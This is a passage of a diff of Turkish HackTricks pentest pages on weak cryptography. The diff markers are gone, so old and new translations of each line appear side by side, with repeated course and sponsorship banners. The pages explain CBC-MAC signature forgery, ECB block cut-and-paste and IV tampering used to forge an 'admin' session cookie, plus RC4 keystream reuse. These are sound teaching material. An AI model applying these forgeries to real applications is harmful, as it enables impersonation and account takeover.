Sonra, m1 ve m2'nin birleştirilmiş olduğu bir mesaj (m3), 2 imza (s31 ve s32) oluşturacaktır:
Sonra m1 ve m2'nin birleştirilmiş olduğu bir mesaj (m3) 2 imza oluşturacaktır (s31 ve s32):
* `E(m1 XOR 0) = s31 = s1`
* `E(m2 XOR s1) = s32`
**Bu, şifrenin anahtarını bilmeden hesaplanabilir.**
8 baytlık bloklar halinde **Yönetici** adını şifrelediğinizi hayal edin:
8 byte'lık bloklar halinde **Yönetici** adını şifrelediğinizi hayal edin:
* `Administ`
* `rator\00\00\00`
**Administ** adında bir kullanıcı oluşturabilir ve imzasını (s1) alabilirsiniz.\
**Administ** (m1) adlı bir kullanıcı adı oluşturabilir ve imzasını (s1) alabilirsiniz.\
Sonra, `rator\00\00\00 XOR s1` işleminin sonucu olan bir kullanıcı adı oluşturabilirsiniz. Bu, s32 olan `E(m2 XOR s1 XOR 0)`'yi oluşturacaktır.\
şimdi, s32'yi **Yönetici** adının tam imzası olarak kullanabilirsiniz.
### Özet
1. Kullanıcı adının **Administ** (m1) imzasını alın, bu s1'dir
2. Kullanıcı adının **rator\x00\x00\x00 XOR s1 XOR 0** imzasını alın, bu s32'dir**.**
1. Kullanıcı adı **Administ** (m1) için imzayı alın, bu s1'dir
2. Kullanıcı adı **rator\x00\x00\x00 XOR s1 XOR 0** için imzayı alın, bu s32'dir.
3. Çerezi s32 olarak ayarlayın ve bu, **Yönetici** kullanıcısı için geçerli bir çerez olacaktır.
# Saldırıyı Kontrol Eden IV
Kullanılan IV'yi kontrol edebiliyorsanız, saldırı çok kolay olabilir.\
Eğer çerez sadece şifrelenmiş kullanıcı adı ise, kullanıcıyı "**yönetici**" olarak taklit etmek için **Yönetici** kullanıcısını oluşturabilir ve çerezini alabilirsiniz.\
Şimdi, IV'yi kontrol edebiliyorsanız, IV'nin ilk baytını değiştirebilirsiniz, böylece **IV\[0] XOR "A" == IV'\[0] XOR "a"** olacak ve **Yönetici** kullanıcısı için çerezi yeniden oluşturabilirsiniz. Bu çerez, başlangıçtaki **IV** ile **yönetici** kullanıcısını taklit etmek için geçerli olacaktır.
Eğer çerez sadece şifrelenmiş kullanıcı adı ise, kullanıcıyı "**yönetici**" olarak taklit etmek için **Yönetici** kullanıcısını oluşturabilir ve onun çerezini alabilirsiniz.\
Şimdi, IV'yi kontrol edebiliyorsanız, IV'nin ilk Byte'ını değiştirebilirsiniz, böylece **IV\[0] XOR "A" == IV'\[0] XOR "a"** olacak ve **Yönetici** kullanıcısı için çerezi yeniden oluşturabilirsiniz. Bu çerez, başlangıçtaki **IV** ile **yönetici** kullanıcısını **taklit etmek** için geçerli olacaktır.
## Referanslar
Daha fazla bilgi için [https://en.wikipedia.org/wiki/CBC-MAC](https://en.wikipedia.org/wiki/CBC-MAC)
{% hint style="success" %}
Öğren ve AWS Hacking pratiği yap:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Öğren ve GCP Hacking pratiği yap: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>AWS hackleme konusunda sıfırdan kahramana kadar öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong>!</strong></summary>
<summary>HackTricks'i Destekle</summary>
HackTricks'ı desteklemenin diğer yolları:
* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
* [**Resmi PEASS & HackTricks ürünlerini alın**](https://peass.creator-spring.com)
* [**PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* **Katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya bizi **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** takip edin.**
* **Hacking püf noktalarınızı paylaşarak PR göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol et!
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katıl veya [**telegram grubuna**](https://t.me/peass) katıl veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip et.**
* **Hacking püf noktalarını paylaşmak için PR'lar göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulun.
</details>
{% endhint %}

View file

@ -1,18 +1,19 @@
# Crypto CTFs Hileleri
# Crypto CTFs İpuçları
{% hint style="success" %}
AWS Hacking'i öğrenin ve uygulayın:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP Hacking'i öğrenin ve uygulayın: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Sıfırdan kahraman olmaya kadar AWS hackleme öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> ile</strong>!</summary>
<summary>HackTricks'i Destekleyin</summary>
HackTricks'ı desteklemenin diğer yolları:
* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**](https://github.com/sponsors/carlospolop)'na göz atın!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**The PEASS Family'yi**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* **Katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya bizi **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)'da **takip edin**.
* **Hacking hilelerinizi paylaşarak PR'lar göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katılın veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip edin.**
* **Hacking ipuçlarını paylaşarak PR göndererek HackTricks ve HackTricks Cloud github depolarına katkıda bulunun.**
</details>
{% endhint %}
## Çevrimiçi Hash Veritabanları
@ -91,7 +92,7 @@ Tüm bu tabanları kontrol edin: [https://github.com/dhondta/python-codext](http
* `BQ%]q@psCd@rH0l`
* **Base85 (Adobe)** \[_!"#$%&'()\*+,-./0-9:;<=>?@A-Z\[\\]^\_\`a-u_]
* `<~BQ%]q@psCd@rH0l~>`
* **Base85 (IPv6 or RFC1924)** \[_0-9A-Za-z!#$%&()\*+-;<=>?@^_\`{|}\~\_]
* **Base85 (IPv6 veya RFC1924)** \[_0-9A-Za-z!#$%&()\*+-;<=>?@^_\`{|}\~\_]
* `Xm4y`V\_|Y(V{dF>\`
* **Base85 (xbtoa)** \[_!"#$%&'()\*+,-./0-9:;<=>?@A-Z\[\\]^\_\`a-u_]
* `xbtoa Begin\nBQ%]q@psCd@rH0l\nxbtoa End N 12 c E 1a S 4e6 R 6991d`
@ -132,17 +133,15 @@ Tüm bu tabanları kontrol edin: [https://github.com/dhondta/python-codext](http
```
╫☐↑Λ↻Λ┏Λ↻☐↑Λ
```
* [http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html](http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html) - 404 Dead: [https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html](https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html)
* [http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html](http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html) - 404 Bulunamadı: [https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html](https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html)
### Morse
```
.... --- .-.. -.-. .- .-. .- -.-. --- .-.. .-
```
* [http://k4.cba.pl/dw/crypo/tools/eng\_morse-encode.html](http://k4.cba.pl/dw/crypo/tools/eng\_morse-encode.html) - 404 Dead: [https://gchq.github.io/CyberChef/](https://gchq.github.io/CyberChef/)
* [http://k4.cba.pl/dw/crypo/tools/eng\_morse-encode.html](http://k4.cba.pl/dw/crypo/tools/eng\_morse-encode.html) - 404 Bulunamadı: [https://gchq.github.io/CyberChef/](https://gchq.github.io/CyberChef/)
### UUencoder
* [http://k4.cba.pl/dw/crypo/tools/eng\_morse-encode.html](http://k4.cba.pl/dw/crypo/tools/eng\_morse-encode.html) - 404 Ölü: [https://gchq.github.io/CyberChef/](https://gchq.github.io/CyberChef/)
```
begin 644 webutils_pl
M2$],04A/3$%(3TQ!2$],04A/3$%(3TQ!2$],04A/3$%(3TQ!2$],04A/3$%(
@ -162,6 +161,8 @@ end
```
* [www.webutils.pl/index.php?idx=xx](https://github.com/carlospolop/hacktricks/tree/bf578e4c5a955b4f6cdbe67eb4a543e16a3f848d/crypto/www.webutils.pl/index.php?idx=xx)
### YEncoder
### YEncoder
```
=ybegin line=128 size=28 name=webutils_pl
@ -192,13 +193,13 @@ drnajapajrna
### A1Z26
Harflerin sayısal değerlerine dönüştürülmesi
Harflerinin sayısal değerlerine
```
8 15 12 1 3 1 18 1 3 15 12 1
```
### Affine Şifreleme
Harfi numaraya dönüştür `(ax+b)%26` (_a_ ve _b_ anahtarlar ve _x_ harfidir) ve sonucu tekrar harfe dönüştür.
Harfi sayıya dönüştür `(ax+b)%26` (_a_ ve _b_ anahtarlar, _x_ harftir) ve sonucu tekrar harfe dönüştür.
```
krodfdudfrod
```
@ -206,7 +207,7 @@ krodfdudfrod
**Multitap**, bir harfi mobil [telefon tuş takımı](https://www.dcode.fr/phone-keypad-cipher) üzerindeki karşılık gelen tuş kodu tarafından tanımlanan tekrarlanan rakamlarla değiştirir (Bu mod, SMS yazarken kullanılır).\
Örneğin: 2=A, 22=B, 222=C, 3=D...\
Bu kodu tanıyabilirsiniz çünkü\*\* birkaç tekrarlanan sayı göreceksiniz\*\*.
Bu kodu tanıyabilirsiniz çünkü\*\* birkaç tekrarlanan numara göreceksiniz\*\*.
Bu kodu şurada çözebilirsiniz: [https://www.dcode.fr/multitap-abc-cipher](https://www.dcode.fr/multitap-abc-cipher)
@ -223,7 +224,7 @@ AABBB ABBAB ABABA AAAAA AAABA AAAAA BAAAA AAAAA AAABA ABBAB ABABA AAAAA
## Sıkıştırma
**Ham Deflate** ve **Ham Inflate** (her ikisini de Cyberchef'te bulabilirsiniz) başlıksız verileri sıkıştırabilir ve açabilir.
**Ham Deflate** ve **Ham Inflate** (her ikisini de Cyberchef'te bulabilirsiniz) verileri başlıksız sıkıştırabilir ve açabilir.
## Kolay Şifreleme
@ -247,7 +248,7 @@ wodsyoidrods
* [https://www.dcode.fr/vigenere-cipher](https://www.dcode.fr/vigenere-cipher)
* [https://www.mygeocachingprofile.com/codebreaker.vigenerecipher.aspx](https://www.mygeocachingprofile.com/codebreaker.vigenerecipher.aspx)
## Güçlü Şifreleme
## Güçlü Kripto
### Fernet
@ -282,16 +283,17 @@ Bir sır X parçaya bölünür ve onu kurtarmak için Y parçaya ihtiyacınız v
* [https://github.com/lockedbyte/cryptovenom](https://github.com/lockedbyte/cryptovenom)
* [https://github.com/nccgroup/featherduster](https://github.com/nccgroup/featherduster)
{% hint style="success" %}
AWS Hacking'ini öğrenin ve uygulayın:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP Hacking'ini öğrenin ve uygulayın: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>AWS hacklemeyi sıfırdan kahraman seviyesine öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary>HackTricks'i Destekleyin</summary>
HackTricks'ı desteklemenin diğer yolları:
* **Şirketinizi HackTricks'te reklamınızı görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**](https://github.com/sponsors/carlospolop)'na göz atın!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)'yi keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuzu görün
* **💬 [Discord grubuna](https://discord.gg/hRep4RUj7f) katılın veya [telegram grubuna](https://t.me/peass) katılın veya bizi Twitter'da** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** takip edin.**
* **Hacking püf noktalarınızı paylaşarak PR'lar göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katılın veya [**telegram grubuna**](https://t.me/peass) katılın veya **bizi** **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**'da takip edin.**
* **Hacking püf noktalarını paylaşarak PR'ler göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) **ve** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **github depolarına katkıda bulunun.**
</details>
{% endhint %}

View file

@ -1,34 +1,35 @@
{% hint style="success" %}
AWS Hacking'ı öğrenin ve uygulayın:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP Hacking'ı öğrenin ve uygulayın: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Sıfırdan kahraman olmaya kadar AWS hacklemeyi öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary>HackTricks'i Destekleyin</summary>
HackTricks'ı desteklemenin diğer yolları:
* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**](https://github.com/sponsors/carlospolop)'na göz atın!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* **Katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya bizi **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**'da takip edin.**
* **Hacking püf noktalarınızı paylaşarak PR'lar göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katılın veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip edin**.
* **Hacking püf noktalarını paylaşarak PR'ler göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
</details>
{% endhint %}
# ECB
(ECB) Elektronik Kod Kitabı - her **açık metin bloğunu** **şifreli blokla** değiştiren **simetrik şifreleme düzeni**. Bu, **en basit** şifreleme düzenidir. Temel fikir, açık metni **N bitlik bloklara bölmek** (giriş verisi bloğunun boyutuna, şifreleme algoritmasına bağlıdır) ve ardından yalnızca anahtar kullanarak her açık metin bloğunu şifrelemek (şifre çözmek) için.
(ECB) Elektronik Kod Kitabı - her **açık metin bloğunu** **şifreli metin bloğuyla değiştiren** simetrik şifreleme şemasıdır. Bu, **en basit** şifreleme şemasıdır. Temel fikir, açık metni **N bitlik bloklara bölmek** (giriş verisi bloğunun boyutuna, şifreleme algoritmasına bağlıdır) ve ardından her açık metin bloğunu yalnızca anahtar kullanarak şifrelemektir (şifre çözmek).
![](https://upload.wikimedia.org/wikipedia/commons/thumb/e/e6/ECB_decryption.svg/601px-ECB_decryption.svg.png)
ECB kullanmanın birden fazla güvenlik sonucu vardır:
* **Şifreli mesajdan bloklar çıkarılabilir**
* **Şifreli mesajdan bloklar yer değiştirebilir**
* **Şifreli mesajdan bloklar taşınabilir**
# Zafiyetin Tespiti
Bir uygulamaya birkaç kez giriş yaparsınız ve **her zaman aynı çerez** alırsınız. Bu, uygulamanın çerezinin **`<kullanıcı adı>|<şifre>`** olduğu içindir.\
Ardından, **uzun şifreleri olan iki yeni kullanıcı oluşturursunuz**, her ikisinin de **neredeyse** **aynı** **kullanıcı adına** sahip olduğunu fark edersiniz.\
Her iki kullanıcının bilgilerinin olduğu **8B'lik blokların** aynı olduğunu fark edersiniz. Bu durumun **ECB kullanıldığından** olabileceğini düşünürsünüz.
Sonra, **uzun şifreleri olan iki yeni kullanıcı oluşturursunuz**, her ikisinin de **neredeyse** **aynı** **kullanıcı adına** sahip olduğunu fark edersiniz.\
Her iki kullanıcının bilgilerinin olduğu **8B'lik blokların** aynı olduğunu **fark edersiniz**. Bu durumun **ECB kullanıldığından** kaynaklanabileceğini düşünürsünüz.
Aşağıdaki örnekte olduğu gibi. İki **çözülmüş çerezin** birden fazla kez **`\x23U\xE45K\xCB\x21\xC8`** bloğuna sahip olduğunu gözlemleyin.
```
@ -52,27 +53,27 @@ Bu, çerezlerin **kullanıcı adı ve şifresinin "a" harfini birkaç kez içerd
## Tüm blokların kaldırılması
Çerezin formatını bildiğinizde (`<kullanıcı adı>|<şifre>`), `admin` kullanıcısını taklit etmek için `aaaaaaaaadmin` adında yeni bir kullanıcı oluşturun ve çerezi alın ve çözümleyin:
Çerezin formatını bildiğinizde (`<kullanıcı adı>|<şifre>`), `admin` kullanıcısını taklit etmek için `aaaaaaaaadmin` adında yeni bir kullanıcı oluşturun ve çerezi alıp çözümleyin:
```
\x23U\xE45K\xCB\x21\xC8\xE0Vd8oE\x123\aO\x43T\x32\xD5U\xD4
```
Önceki olarak yalnızca `a` içeren kullanıcı adı ile oluşturulan `\x23U\xE45K\xCB\x21\xC8` desenini görebiliriz.\
Sonra, ilk 8B bloğunu kaldırabilir ve `admin` kullanıcı adı için geçerli bir çerez elde edersiniz:
Şablonu `\x23U\xE45K\xCB\x21\xC8` içeren kullanıcı adıyla oluşturulan deseni görebiliriz.\
Ardından, ilk 8B bloğunu kaldırabilir ve `admin` kullanıcı adı için geçerli bir çerez elde edebilirsiniz:
```
\xE0Vd8oE\x123\aO\x43T\x32\xD5U\xD4
```
## Blokları Taşımak
Birçok veritabanında `WHERE username='admin';` veya `WHERE username='admin ';` aramak aynı sonucu verir _(Ekstra boşluklara dikkat)_
Birçok veritabanında `WHERE username='admin';` veya `WHERE username='admin ';` aramak aynı sonucu verir _(Ekstra boşluklara dikkat edin)_
Bu nedenle, kullanıcı `admin`yi taklit etmenin başka bir yolu şöyle olabilir:
* `len(<username>) + len(<delimiter) % len(block)` uzunluğunda bir kullanıcı adı oluşturun. `8B` blok boyutuyla `username ` adında bir kullanıcı adı ve `|` ayraçla `<username><delimiter>` parçası 2 adet 8B'lik blok oluşturacaktır.
* Ardından, taklit etmek istediğimiz kullanıcı adını ve boşlukları içeren tam sayıda bloğu dolduracak bir şifre oluşturun, örneğin: `admin `
* `len(<username>) + len(<delimiter) % len(block)` uzunluğunda bir kullanıcı adı oluşturun. `8B` blok boyutuyla `username ` adında bir kullanıcı adı oluşturabilirsiniz, `|` ayraç ile `<username><delimiter>` parçası 2 adet 8B'lik blok oluşturacaktır.
* Ardından, istediğimiz kullanıcı adını ve boşlukları içeren tam sayıda bloğu dolduracak bir şifre oluşturun, örneğin: `admin `
Bu kullanıcının çerezi 3 bloktan oluşacaktır: ilk 2 blok kullanıcı adı + ayraç blokları ve üçüncüsü (kullanıcı adını taklit eden) şifre bloğu: `username |admin `
**Sonra, sadece ilk bloğu son blokla değiştirin ve `admin` kullanıcısını taklit etmiş olacaksınız: `admin |username`**
**Sonra, sadece ilk bloğu en son blokla değiştirin ve `admin` kullanıcısını taklit etmiş olacaksınız: `admin |username`**
## Referanslar

View file

@ -1,21 +1,22 @@
{% hint style="success" %}
Öğren ve AWS Hacking pratiği yap:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Öğren ve GCP Hacking pratiği yap: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>AWS hackleme konusunda sıfırdan kahramana dönüşmek için</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong> öğrenin!</strong></summary>
<summary>HackTricks'i Destekle</summary>
HackTricks'ı desteklemenin diğer yolları:
* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* **Katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya bizi **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** takip edin.**
* **Hacking püf noktalarınızı göndererek HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına PR göndererek paylaşın.
* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol et!
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katıl veya [**telegram grubuna**](https://t.me/peass) katıl veya **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**'ı takip et.**
* **Hacking püf noktalarını paylaşmak için PR göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulun.
</details>
{% endhint %}
Eğer bir metni RC4 kullanarak şifreleyebilirseniz, aynı şifreleme fonksiyonunu kullanarak o RC4 ile şifrelenmiş herhangi bir içeriği deşifre edebilirsiniz (aynı şifreyi kullanarak).
Bir bilinen metni şifreleyebilirseniz, aynı zamanda şifreyi de çıkarabilirsiniz. Daha fazla referans HTB Kryptos makinesinde bulunabilir:
Bilinen bir metni şifreleyebilirseniz, aynı zamanda şifreyi de çıkarabilirsiniz. Daha fazla referans HTB Kryptos makinesinde bulunabilir:
{% embed url="https://0xrick.github.io/hack-the-box/kryptos/" %}

View file

@ -1,83 +1,83 @@
{% hint style="success" %}
Öğren ve AWS Hacking pratiği yap:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Öğren ve GCP Hacking pratiği yap: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>AWS hackleme becerilerini sıfırdan kahraman seviyesine öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong>!</strong></summary>
<summary>HackTricks'i Destekle</summary>
HackTricks'ı desteklemenin diğer yolları:
* Şirketinizi HackTricks'te **reklamını görmek** veya HackTricks'i **PDF olarak indirmek** için [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* Özel [**NFT'lerden**](https://opensea.io/collection/the-peass-family) oluşan koleksiyonumuz olan [**The PEASS Family**](https://opensea.io/collection/the-peass-family)'yi keşfedin
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya **Twitter** üzerinden bizi takip edin 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Hacking hilelerinizi** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına **PR göndererek paylaşın**.
* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol et!
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katıl veya [**telegram grubuna**](https://t.me/peass) katıl veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip et.**
* **Hacking püf noktalarını paylaşmak için PR'lar göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulun.
</details>
{% endhint %}
# CBC
Eğer **çerez** sadece **kullanıcı adı**dır (veya çerezin ilk kısmı kullanıcı adıdır) ve kullanıcı adını "**admin**" olarak taklit etmek istiyorsanız. O zaman, **"bdmin"** kullanıcı adını oluşturabilir ve çerezin **ilk baytını** brute force yöntemiyle bulabilirsiniz.
Eğer **çerez** sadece **kullanıcı adı** (veya çerezin ilk kısmı kullanıcı adı ise) ise ve kullanıcı adını "**admin**" olarak taklit etmek istiyorsanız. O zaman, kullanıcı adını **"bdmin"** olarak oluşturabilir ve çerezin **ilk byte'ını** **bruteforce** edebilirsiniz.
# CBC-MAC
**Cipher block chaining message authentication code** (**CBC-MAC**), kriptografi alanında kullanılan bir yöntemdir. Bu yöntem, bir mesajı blok blok şifreleyerek çalışır, her bloğun şifrelemesi bir önceki bloğa bağlıdır. Bu süreç, orijinal mesajın sadece bir bitinin bile değiştirilmesinin şifrelenmiş verinin son bloğunda tahmin edilemez bir değişikliğe yol açacağından emin olmak için bir **blok zinciri** oluşturur. Böyle bir değişiklik yapmak veya tersine çevirmek için şifreleme anahtarı gereklidir, bu da güvenliği sağlar.
**Şifre blok zincirleme mesaj doğrulama kodu** (**CBC-MAC**), kriptografi alanında kullanılan bir yöntemdir. Bir mesajı blok blok şifreleyerek çalışır, her bloğun şifrelemesi bir önceki bloğa bağlıdır. Bu süreç, orijinal mesajın sadece bir bitinin bile değiştirilmesinin şifrelenmiş verinin son bloğunda öngörülemeyen bir değişikliğe yol açacağından emin olmak için bir **blok zinciri** oluşturur. Böyle bir değişiklik yapmak veya tersine çevirmek için şifreleme anahtarı gereklidir, bu da güvenliği sağlar.
Mesaj m'nin CBC-MAC'ini hesaplamak için, m'yi sıfır başlangıç vektörüyle CBC modunda şifreler ve son bloğu saklar. Aşağıdaki şekil, bir gizli anahtar k ve bir blok şifreleme E kullanılarak bloklardan oluşan bir mesajın CBC-MAC'inin hesaplanmasını taslak olarak gösterir:
![https://wikimedia.org/api/rest\_v1/media/math/render/svg/bbafe7330a5e40a04f01cc776c9d94fe914b17f5](https://wikimedia.org/api/rest\_v1/media/math/render/svg/bbafe7330a5e40a04f01cc776c9d94fe914b17f5) kullanılarak CBC-MAC'in hesaplanması
